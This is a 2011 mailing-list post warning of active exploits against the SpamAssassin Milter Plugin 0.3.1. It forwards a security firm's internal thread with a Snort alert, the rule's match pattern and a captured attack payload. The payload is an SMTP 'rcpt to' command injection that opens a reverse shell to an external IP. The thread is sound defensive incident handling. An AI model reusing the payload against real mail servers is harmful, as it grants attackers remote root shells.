Copying the spamass-milter mailing list. On 02/10/2011 09:42 AM, Michael Scheidell wrote: >> if case you are using spamassassin milter: >> >> active exploits going on. >> >> <http://seclists.org/fulldisclosure/2010/Mar/140> >> <http://www.securityfocus.com/bid/38578> >> >> Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1 >> >> I don't see anything on bugtraq about a fix.
On 02/10/2011 10:21 AM, David F. Skoll wrote: > Aieee.... popen() in security-sensitive software!??!?? > > Also, why does the milter process run as root? That seems like a huge > hole all by itself. Does this affect sendmail as well as postfix? I assume so, but wanted an explicit confirmation. (I am no longer managing an environment that uses this milter and therefore cannot verify myself.)
--- Begin Message ---heads up: if case you are using spamassassin milter: active exploits going on. <http://seclists.org/fulldisclosure/2010/Mar/140> <http://www.securityfocus.com/bid/38578> Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1 I don't see anything on bugtraq about a fix. -------- Original Message --------Subject: RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection AttemptThe rule is only looking for this: content:"to|3A|"; depth:10; nocase; content:"+|3A|\"|7C|";Personally, I would probably block it. Although, if we're not seeing this sort of thing pop up on customer's boxes, a manual block in scanner2 is sufficient for now, right?Either way, let me know and I'll block/unblock/leave alone. -- John Meyer Associate Security Engineer|SECNAP Network SecurityOffice: (561) 999-5000 x:1235 Direct: (561) 948-2264 *From:*Michael Scheidell *Sent:* Thursday, February 10, 2011 12:25 PM *To:* John Meyer *Cc:* Jonathan Scheidell; Anthony Wetula*Subject:* Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attemptis the snort rule specific enough that you can block the offending ip for 5 mins?(if its a real smtp server, it will retry) and legit email through. On 2/10/11 12:12 PM, John Meyer wrote: I don't like the looks of this. I blocked that IP with samtool. Payload: rcpt to: root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0" data . quit -- John Meyer Associate Security Engineer|SECNAP Network SecurityOffice: (561) 999-5000 x:1235 Direct: (561) 948-2264 *From:*SECNAP Network Security *Sent:* Thursday, February 10, 2011 12:01 PM *To:* security-al...@scanner2.secnap.com*Subject:* alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt02/10-12:00:59 <trust1> TCP 62.206.228.188:56691 --> 10.70.1.33:25[1:2010877:3] ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt[Classification: Attempted User Privilege Gain] [Priority: 1] -- Michael Scheidell, CTO o: 561-999-5000 d: 561-948-2259 ISN: 1259*1300*| *SECNAP Network Security Corporation·Certified SNORT Integrator ·2008-9 Hot Company Award Winner, World Executive Alliance ·Five-Star Partner Program 2009, VARBusiness ·Best in Email Security,2010: Network Products Guide ·King of Spam Filters, SC Magazine 2008 ______________________________________________________________________This email has been scanned and certified safe by SpammerTrap(r). For Information please see http://www.secnap.com/products/spammertrap/______________________________________________________________________
--- End Message ---
signature.asc
Description: OpenPGP digital signature